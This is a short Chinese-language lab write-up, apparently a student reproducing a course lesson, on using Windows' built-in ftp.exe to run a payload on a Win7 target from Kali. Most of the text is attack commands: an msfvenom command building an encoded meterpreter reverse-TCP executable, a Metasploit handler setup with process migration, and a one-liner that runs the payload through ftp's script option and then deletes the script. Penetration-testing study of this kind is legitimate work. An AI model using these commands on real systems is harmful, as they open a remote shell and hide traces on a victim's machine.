还是自己动手复现亮神课程的过程。
环境 靶机win7
攻击机 kali
Ftp.exe简介:
Ftp.exe是Windows本身自带的一个程序,属于微软TP工具,提供基本的FTP访问
说明:Ftp.exe所在路径已被系统添加PATH环境
Windows 2003 默认位置:
C:\Windows\System32\ftp.exe
C:\Windows\SysWOW64\ftp.exe
Windows 7 默认位置:
C:\Windows\System32\ftp.exe
C:\Windows\SysWOW64\ftp.exe
1、首先攻击机msfvenom生成一个反弹马
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.190.141 LPORT=4444 -f exe > ./1.exe
2、然后攻击机kali开启监听模块
注:需设置参数set AutoRunScript migrate -f (AutoRunScript是msf中一个强大的自动化的后渗透工具,这里migrate参数是迁移木马到其他进程)
use exploit/multi/handler/ set payload windows/meterpreter/reverse_tcp set AutoRunScript migrate -f set LHOST 192.168.190.141 set LPORT 4444 exploit
3、靶机通过ftp执行木马
echo !C:\1.exe > o &echo quit >> o &ft p ‐n ‐s:o &del /F /Q o
Ps:(>符号是重定向文件,>>是追加文件内容,ftp命令中-n是禁止在初始连接时自动登录,-s是读取并执行有ftp命令的文件,del命令中/F是强制删除,/Q是安静模式,删除时不需要确认)
这里容易卡死 多试一次即可~